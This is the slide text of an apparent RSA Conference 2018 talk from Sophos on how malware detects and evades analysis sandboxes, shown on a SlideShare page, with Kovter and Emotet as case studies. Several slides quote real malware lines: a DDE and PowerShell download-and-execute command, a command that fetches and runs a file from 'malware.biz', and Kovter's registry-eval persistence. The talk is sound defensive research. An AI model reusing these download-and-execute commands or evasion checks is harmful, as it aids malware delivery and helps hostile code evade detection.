SlideShare ist ein Scribd-Unternehmen logo

Playing games-in-the-sandbox-dynamic-analysis-and-modern-evasion-tactics copy1

Priyanka Aash
Priyanka Aash

With many organizations using a sandbox to detonate suspicious files, many threats are implementing logic to detect sandbox environments, to alter their behavior and evade detection. This talk will highlight many real-world evasion tactics employed by recent malware, discussing challenges in measuring evasive behaviors and offering insights to improving the effectiveness of the sandbox. (Source: RSA Conference USA 2018)

Technologie
1 von 46
Downloaden Sie, um offline zu lesen
SESSION ID: #RSAC Michael Wood PLAYING GAMES IN THE SANDBOX— DYNAMIC ANALYSIS AND MODERN EVASION TACTICS AIR-F03 Senior Manager, Dynamic Protection, SophosLabs Sophos
# R S A C Cloud Sandbox 2 Internet Known Good Execute Known Bad? Sandbox
# R S A C • Malware comes in all shapes and sizes… o Windows executables o Office & PDF documents o Scripts, Java, Windows Shortcuts o Zip, Tar, Rar, & archives • Detect 0-day threats based on behavior What is a Cloud Sandbox useful for? 3
# R S A C Example: 0-day DDE exploit 4 Intended use – spreadsheet data link { DDEAUTO excel "C:My DocumentsProfits.xls“ "Sheet1!R1C1:R4C4" p } Exploited use – malware download { DDEAUTO cmd.exe “/k powershell -NonI -NoP -sta $a1=(new-object IO.StreamReader ((([Net.WebRequest]::Create([System.Uri]'http://redacted[.]com/kdjsw2 3FGS')).GetResponse()).GetResponseStream())).ReadToEnd();powershell - e $a1” }
# R S A C • Malware comes in all shapes and sizes… o Windows executables o Office & PDF documents o Scripts, Java, Windows Shortcuts o Zip, Tar, Rar, & archives • Detect 0-day threats based on behavior • But what if the threat behaves differently in the Sandbox? What is a Cloud Sandbox useful for? 5
# R S A C Evasive threats 6 IF is_sandbox() THEN something_good() ELSE something_bad()
# R S A C is_sandbox() •Artifacts: Files, Registry Keys, Drivers, Disk/CPU names •Behavior: CPU behavior Anti-VM •Artifacts: tools or scripts, realistic hardware •Behavior: human-like activity Anti-sandbox •Explicit delay: Sleep(…) •Implicit delay: user interaction required Timing
# R S A C something_good() ExitProcess() Loop forever Self delete
#RSAC IN THE WILD
# R S A C Kovter Malware HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun mshta.exe javascript: W9N=new ActiveXObject("WScript.Shell"); ztJ4n7=W9N.RegRead("HKCUsoftware4a9e7b11c06bee3829"); eval(ztJ4n7);
# R S A C Kovter – VM Evasion Tests 11 Running processes VBoxService.exe VMwareUser.exe Registry keys HARDWAREACPIDSDTVBOX__ HKLMSOFTWAREVMWare, Inc. Other artifacts .vmmemctl PIPE VMwareCopyPasteSetClipboard event
# R S A C CPUID - Artifacts CPUID Vendor -> “GenuineIntel” CPUID Hypervisor -> 0x0 CPUID Vendor -> “KVMKVMKVM” CPUID Hypervisor -> 0x80000000
# R S A C CPUID - Timing CPUID… CPUID… …“GenuineIntel” t1 t2 t1t2 CPUID cost
# R S A C Evasive Activity Legitimacy
#RSAC ACTIVE EVASIONS
# R S A C Document Malware
# R S A C Macro Evasion: Realistic Filename “Is my file name… “ “… only hexadecimal characters?“
# R S A C Macro Evasion: Realistic History “Is there fewer than 3 recently used files?“
# R S A C Macro Evasion: Blacklist Processes “Are there any VM or analysis tools running?“
# R S A C Macro Evasion: GEO IP “Does the GEO IP match my target?“
# R S A C Leverage #1 - Protection is_sandbox() something_bad()
# R S A C Leverage #2 – Bypass Does C:B78AE926 exist? No: Run evasions Yes: Run malware
# R S A C Leverage #3 - Vaccination is_sandbox() == TRUE
#RSAC PASSIVE EVASIONS
# R S A C Documents: Some Clicks Required
# R S A C Time: 0 min Time: 2 min Time: 5 min Explicit Delay powershell “ sleep 300; new-object system.net.webclient.downloadfile). Invoke('https://malware.biz/foo',‘%TEMP%Local.exe') & start-process ‘%TEMP%Local.exe'" Sandbox Analysis
# R S A C Implicit Delay: Busy work FOR i=0; i < 500,000; i++ DO IsDebuggerPresent() END FOR Bare Metal Virtual Machine Sandbox
# R S A C Typical Human Input GetLastInputInfo() GetCursorPos()
# R S A C File Structure > unzip -l IMAGES.ZIP Length Date Time Name --------- ---------- ----- ---- 518144 2018-01-17 02:17 IMG_1715.jpg <--- Windows EXE!!! 364671 2018-01-13 12:39 IMG_1716.jpg <--- JPEG image 430040 2018-01-13 12:39 IMG_1717.jpg <--- JPEG image 452211 2018-01-13 12:39 IMG_1718.jpg <--- JPEG image 391279 2018-01-13 12:38 IMG_1719.jpg <--- JPEG image --------- ------- 2156345 5 files
#RSAC EVASIVE TIMELINE: EMOTET
# R S A C Emotet Delivery: Some Clicks Required
# R S A C Emotet: Custom Loader Jul 2017 – Decrypts in-place Aug 2017 – Loader added Packed EXE decrypt Emotet EXE Packed EXE decrypt Emotet EXE Loader EXE
# R S A C Emotet EXE Emotet – Oct 2017, is_sandbox() v1 Loader EXE evasions is_sandboxsample.exe artifact.exe John Doe TEQUILABOOMBOOM Wilbert / SC admin / SystemIT C:123email.doc C:email.htm C:email.doc
# R S A C Emotet: Loader In-Memory Obfuscation Emotet EXE Loader EXE busy work Stolen Code 1. New memory region for stolen instructions 2. Steal instructions from EXE, patch in detour to “busy work” routine evasions
# R S A C Emotet: Dec 2017, is_sandbox() v2 Loader Evasions V1 String comparisons – tested via lstrcmpA API File existence – tested via CreateFileA API Sandbox detected => ExitProcess() Loader Evasions V2 String comparisons – inline strcmp function, no API File existence – full file system enumeration via FindFirstFile API Sandbox detected => repeat evasion tests, infinitely
# R S A C Emotet: Dec 2017, is_sandbox() v2 Loader Evasions V1 String comparisons – tested via lstrcmpA API File existence – tested via CreateFileA API Sandbox detected => ExitProcess() Loader Evasions V2 String comparisons – inline strcmp function, no API File existence – full file system enumeration via FindFirstFile API Sandbox detected => repeat evasion tests, infinitely Hide sensitive strings, like “TEQUILABOOMBOOM” Queries for sensitive data remain
# R S A C Emotet: Dec 2017, is_sandbox() v2 Loader Evasions V1 String comparisons – tested via lstrcmpA API File existence – tested via CreateFileA API Sandbox detected => ExitProcess() Loader Evasions V2 String comparisons – inline strcmp function, no API File existence – full file system enumeration via FindFirstFile API Sandbox detected => repeat evasion tests, infinitely Hide sensitive strings, like “sample.exe” Huge increase in file system inspection activity
# R S A C Emotet: Dec 2017, is_sandbox() v2 Loader Evasions V1 String comparisons – tested via lstrcmpA API File existence – tested via CreateFileA API Sandbox detected => ExitProcess() Loader Evasions V2 String comparisons – inline strcmp function, no API File existence – full file system enumeration via FindFirstFile API Sandbox detected => repeat evasion tests, infinitely Avoid bailout “tell” Repeated increase in file system inspection activity
# R S A C Emotet: Jan 2018, Evasion Fragments 39 is_sandbox() disabled, but … Dec 2017 TEQUILABOOMBOOM SystemIT John Doe Jan 2018 "T E Q U I L A B O O M B O O M” “S y s t e m I T” Aller Doe
# R S A C Emotet: Feb 2018, Evasion Retraction Emotet EXE Loader EXE Stolen Code busy work evasions
# R S A C Emotet Evasive Tactic Timeline Jul 2017 •Busy work Aug 2017 •Loader module Oct 2017 •is_sandbox v1 Dec 2017 •is_sandbox v2 •something_good v2 Jan 2018 •is_sandbox “off” •Fragments remain Feb 2018 •is_sandbox removed
#RSAC TAKEAWAYS
# R S A C Summary Leverage • is_sandbox() == something_bad() Battle ground • Infinitely many tactics, equally many defenses Raise the bar • Attacks require greater depth & complexity
# R S A C Predictions Virtual machine tactics - expect decline •Existing mitigations, assets in the cloud Human-like behavior – expect growth •Real user activity, victim profiling Avoid detonation – expect growth •Dodge execution in the Sandbox altogether
# R S A C Actions: Engage, Familiarize, Experiment • Security partner’s approach to evasive threatsEngage • Open-source tools to test anti-sandbox tacticsFamiliarize • Deploy your own open-source sandboxExperiment PAFish Tool https://github.com/a0rtega/pafish Al-KhaserTool https://github.com/LordNoteworthy/al-khaser Cuckoo Sandbox https://cuckoosandbox.org/
#RSAC THANK YOU

Empfohlen

Windows persistence presentation
Windows persistence presentationWindows persistence presentation
Windows persistence presentation
OlehLevytskyi1
 
(130119) #fitalk apt, cyber espionage threat
(130119) #fitalk apt, cyber espionage threat(130119) #fitalk apt, cyber espionage threat
(130119) #fitalk apt, cyber espionage threat
INSIGHT FORENSIC
 
Cómo construir pipelines para streaming de datos en visualizaciones: Un ejemp...
Cómo construir pipelines para streaming de datos en visualizaciones: Un ejemp...Cómo construir pipelines para streaming de datos en visualizaciones: Un ejemp...
Cómo construir pipelines para streaming de datos en visualizaciones: Un ejemp...
Software Guru
 
4055-841_Project_ShailendraSadh
4055-841_Project_ShailendraSadh4055-841_Project_ShailendraSadh
4055-841_Project_ShailendraSadh
Shailendra Sadh - CISSP
 
[2014 CodeEngn Conference 11] 김호빈 - Android Bootkit Analysis EN
[2014 CodeEngn Conference 11] 김호빈 - Android Bootkit Analysis EN[2014 CodeEngn Conference 11] 김호빈 - Android Bootkit Analysis EN
[2014 CodeEngn Conference 11] 김호빈 - Android Bootkit Analysis EN
GangSeok Lee
 
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
PROIDEA
 
Bsides chicago 2013 honeypots
Bsides chicago 2013 honeypotsBsides chicago 2013 honeypots
Bsides chicago 2013 honeypots
Tazdrumm3r
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentation
OlehLevytskyi1
 

Empfohlen

Windows persistence presentation
Windows persistence presentationWindows persistence presentation
Windows persistence presentation
OlehLevytskyi1
 
(130119) #fitalk apt, cyber espionage threat
(130119) #fitalk apt, cyber espionage threat(130119) #fitalk apt, cyber espionage threat
(130119) #fitalk apt, cyber espionage threat
INSIGHT FORENSIC
 
Cómo construir pipelines para streaming de datos en visualizaciones: Un ejemp...
Cómo construir pipelines para streaming de datos en visualizaciones: Un ejemp...Cómo construir pipelines para streaming de datos en visualizaciones: Un ejemp...
Cómo construir pipelines para streaming de datos en visualizaciones: Un ejemp...
Software Guru
 
4055-841_Project_ShailendraSadh
4055-841_Project_ShailendraSadh4055-841_Project_ShailendraSadh
4055-841_Project_ShailendraSadh
Shailendra Sadh - CISSP
 
[2014 CodeEngn Conference 11] 김호빈 - Android Bootkit Analysis EN
[2014 CodeEngn Conference 11] 김호빈 - Android Bootkit Analysis EN[2014 CodeEngn Conference 11] 김호빈 - Android Bootkit Analysis EN
[2014 CodeEngn Conference 11] 김호빈 - Android Bootkit Analysis EN
GangSeok Lee
 
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
PROIDEA
 
Bsides chicago 2013 honeypots
Bsides chicago 2013 honeypotsBsides chicago 2013 honeypots
Bsides chicago 2013 honeypots
Tazdrumm3r
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentation
OlehLevytskyi1
 
Bsides detroit 2013 honeypots
Bsides detroit 2013 honeypotsBsides detroit 2013 honeypots
Bsides detroit 2013 honeypots
Tazdrumm3r
 
"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski
PROIDEA
 
The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)
Javier Junquera
 
Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]
RootedCON
 
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environmentThreat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Nahidul Kibria
 
End-to-End Analysis of a Domain Generating Algorithm Malware Family
End-to-End Analysis of a Domain Generating Algorithm Malware FamilyEnd-to-End Analysis of a Domain Generating Algorithm Malware Family
End-to-End Analysis of a Domain Generating Algorithm Malware Family
CrowdStrike
 
DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...
DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...
DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...
Felipe Prado
 
tit
tittit
tit
Christian Heinrich
 
Dangling DNS records takeover at scale
Dangling DNS records takeover at scaleDangling DNS records takeover at scale
Dangling DNS records takeover at scale
Chandrapal Badshah
 
Anton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin on Discovering That Your Linux Box is HackedAnton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin
 
Linux Kernel - Let's Contribute!
Linux Kernel - Let's Contribute!Linux Kernel - Let's Contribute!
Linux Kernel - Let's Contribute!
Levente Kurusa
 
Native hook mechanism in Android Bionic linker
Native hook mechanism in Android Bionic linkerNative hook mechanism in Android Bionic linker
Native hook mechanism in Android Bionic linker
Kevin Mai-Hsuan Chia
 
Malware analysis - What to learn from your invaders
Malware analysis - What to learn from your invadersMalware analysis - What to learn from your invaders
Malware analysis - What to learn from your invaders
Tazdrumm3r
 
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
CODE BLUE
 
Assume Compromise
Assume CompromiseAssume Compromise
Assume Compromise
Zach Grace
 
About linux-english
About linux-englishAbout linux-english
About linux-english
Shota Ito
 
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
OpenDNS
 
"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz
PROIDEA
 
ApacheCon NA 2011 report
ApacheCon NA 2011 reportApacheCon NA 2011 report
ApacheCon NA 2011 report
Koji Kawamura
 
Nozzle: A Defense Against Heap-spraying Code Injection Attacks
Nozzle: A Defense Against Heap-spraying Code Injection AttacksNozzle: A Defense Against Heap-spraying Code Injection Attacks
Nozzle: A Defense Against Heap-spraying Code Injection Attacks
guest101353
 
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentationMacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
OlehLevytskyi1
 
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackHacking Exposed: The Mac Attack
Hacking Exposed: The Mac Attack
Priyanka Aash
 

Weitere ähnliche Inhalte

Was ist angesagt?

Bsides detroit 2013 honeypots
Bsides detroit 2013 honeypotsBsides detroit 2013 honeypots
Bsides detroit 2013 honeypots
Tazdrumm3r
 
End-to-End Analysis of a Domain Generating Algorithm Malware Family
End-to-End Analysis of a Domain Generating Algorithm Malware FamilyEnd-to-End Analysis of a Domain Generating Algorithm Malware Family
End-to-End Analysis of a Domain Generating Algorithm Malware Family
CrowdStrike
 
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
CODE BLUE
 
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
OpenDNS
 
ApacheCon NA 2011 report
ApacheCon NA 2011 reportApacheCon NA 2011 report
ApacheCon NA 2011 report
Koji Kawamura
 
Nozzle: A Defense Against Heap-spraying Code Injection Attacks
Nozzle: A Defense Against Heap-spraying Code Injection AttacksNozzle: A Defense Against Heap-spraying Code Injection Attacks
Nozzle: A Defense Against Heap-spraying Code Injection Attacks
guest101353
 

Was ist angesagt? (20)

Bsides detroit 2013 honeypots
Bsides detroit 2013 honeypotsBsides detroit 2013 honeypots
Bsides detroit 2013 honeypots
 
"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski
 
The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)
 
Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]
 
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environmentThreat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
 
End-to-End Analysis of a Domain Generating Algorithm Malware Family
End-to-End Analysis of a Domain Generating Algorithm Malware FamilyEnd-to-End Analysis of a Domain Generating Algorithm Malware Family
End-to-End Analysis of a Domain Generating Algorithm Malware Family
 
DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...
DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...
DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...
 
tit
tittit
tit
 
Dangling DNS records takeover at scale
Dangling DNS records takeover at scaleDangling DNS records takeover at scale
Dangling DNS records takeover at scale
 
Anton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin on Discovering That Your Linux Box is HackedAnton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin on Discovering That Your Linux Box is Hacked
 
Linux Kernel - Let's Contribute!
Linux Kernel - Let's Contribute!Linux Kernel - Let's Contribute!
Linux Kernel - Let's Contribute!
 
Native hook mechanism in Android Bionic linker
Native hook mechanism in Android Bionic linkerNative hook mechanism in Android Bionic linker
Native hook mechanism in Android Bionic linker
 
Malware analysis - What to learn from your invaders
Malware analysis - What to learn from your invadersMalware analysis - What to learn from your invaders
Malware analysis - What to learn from your invaders
 
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
 
Assume Compromise
Assume CompromiseAssume Compromise
Assume Compromise
 
About linux-english
About linux-englishAbout linux-english
About linux-english
 
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
 
"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz
 
ApacheCon NA 2011 report
ApacheCon NA 2011 reportApacheCon NA 2011 report
ApacheCon NA 2011 report
 
Nozzle: A Defense Against Heap-spraying Code Injection Attacks
Nozzle: A Defense Against Heap-spraying Code Injection AttacksNozzle: A Defense Against Heap-spraying Code Injection Attacks
Nozzle: A Defense Against Heap-spraying Code Injection Attacks
 

Ähnlich wie Playing games-in-the-sandbox-dynamic-analysis-and-modern-evasion-tactics copy1

Catching Multilayered Zero-Day Attacks on MS Office
Catching Multilayered Zero-Day Attacks on MS OfficeCatching Multilayered Zero-Day Attacks on MS Office
Catching Multilayered Zero-Day Attacks on MS Office
Kaspersky
 
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
CODE BLUE
 
27.2.10 lab extract an executable from a pcap
27.2.10 lab extract an executable from a pcap27.2.10 lab extract an executable from a pcap
27.2.10 lab extract an executable from a pcap
Freddy Buenaño
 
How We Analyzed 1000 Dumps in One Day - Dina Goldshtein, Brightsource - DevOp...
How We Analyzed 1000 Dumps in One Day - Dina Goldshtein, Brightsource - DevOp...How We Analyzed 1000 Dumps in One Day - Dina Goldshtein, Brightsource - DevOp...
How We Analyzed 1000 Dumps in One Day - Dina Goldshtein, Brightsource - DevOp...
DevOpsDays Tel Aviv
 
Антон Наумович, Система автоматической крэш-аналитики своими средствами
Антон Наумович, Система автоматической крэш-аналитики своими средствамиАнтон Наумович, Система автоматической крэш-аналитики своими средствами
Антон Наумович, Система автоматической крэш-аналитики своими средствами
Sergey Platonov
 
Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]
RootedCON
 

Ähnlich wie Playing games-in-the-sandbox-dynamic-analysis-and-modern-evasion-tactics copy1 (20)

MacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentationMacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
 
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackHacking Exposed: The Mac Attack
Hacking Exposed: The Mac Attack
 
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackHacking Exposed: The Mac Attack
Hacking Exposed: The Mac Attack
 
Catching Multilayered Zero-Day Attacks on MS Office
Catching Multilayered Zero-Day Attacks on MS OfficeCatching Multilayered Zero-Day Attacks on MS Office
Catching Multilayered Zero-Day Attacks on MS Office
 
Basic malware analysis
Basic malware analysis Basic malware analysis
Basic malware analysis
 
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
 
Nullbyte 6ed. 2019
Nullbyte 6ed. 2019Nullbyte 6ed. 2019
Nullbyte 6ed. 2019
 
Forensics perspective ERFA-møde marts 2017
Forensics perspective ERFA-møde marts 2017 Forensics perspective ERFA-møde marts 2017
Forensics perspective ERFA-møde marts 2017
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps Toolchains
 
Basic malware analysis
Basic malware analysisBasic malware analysis
Basic malware analysis
 
27.2.10 lab extract an executable from a pcap
27.2.10 lab extract an executable from a pcap27.2.10 lab extract an executable from a pcap
27.2.10 lab extract an executable from a pcap
 
How We Analyzed 1000 Dumps in One Day - Dina Goldshtein, Brightsource - DevOp...
How We Analyzed 1000 Dumps in One Day - Dina Goldshtein, Brightsource - DevOp...How We Analyzed 1000 Dumps in One Day - Dina Goldshtein, Brightsource - DevOp...
How We Analyzed 1000 Dumps in One Day - Dina Goldshtein, Brightsource - DevOp...
 
Memory forensics cheat sheet
Memory forensics cheat sheetMemory forensics cheat sheet
Memory forensics cheat sheet
 
Антон Наумович, Система автоматической крэш-аналитики своими средствами
Антон Наумович, Система автоматической крэш-аналитики своими средствамиАнтон Наумович, Система автоматической крэш-аналитики своими средствами
Антон Наумович, Система автоматической крэш-аналитики своими средствами
 
Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]
 
From Problem to Solution: Enumerating Windows Firewall-Hook Drivers
From Problem to Solution: Enumerating Windows Firewall-Hook DriversFrom Problem to Solution: Enumerating Windows Firewall-Hook Drivers
From Problem to Solution: Enumerating Windows Firewall-Hook Drivers
 
OSX Pirrit : Why you should care about malicious mac adware
OSX Pirrit : Why you should care about malicious mac adwareOSX Pirrit : Why you should care about malicious mac adware
OSX Pirrit : Why you should care about malicious mac adware
 
Isolating the Ghost in the Machine: Unveiling Post Exploitation Threatsrsac
Isolating the Ghost in the Machine: Unveiling Post Exploitation ThreatsrsacIsolating the Ghost in the Machine: Unveiling Post Exploitation Threatsrsac
Isolating the Ghost in the Machine: Unveiling Post Exploitation Threatsrsac
 
STIX Patterning: Viva la revolución!
STIX Patterning: Viva la revolución!STIX Patterning: Viva la revolución!
STIX Patterning: Viva la revolución!
 
DevSecCon Talk: An experiment in agile Threat Modelling
DevSecCon Talk: An experiment in agile Threat ModellingDevSecCon Talk: An experiment in agile Threat Modelling
DevSecCon Talk: An experiment in agile Threat Modelling
 

Mehr von Priyanka Aash

Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
Priyanka Aash
 

Mehr von Priyanka Aash (20)

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOs
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdf
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdf
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdf
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdf
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
 
DPDP Act 2023.pdf
DPDP Act 2023.pdfDPDP Act 2023.pdf
DPDP Act 2023.pdf
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdf
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdf
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdf
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdf
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 Battlefield
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware Attacks
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security Governance
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 

Kürzlich hochgeladen

Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
Enterprise Knowledge
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 
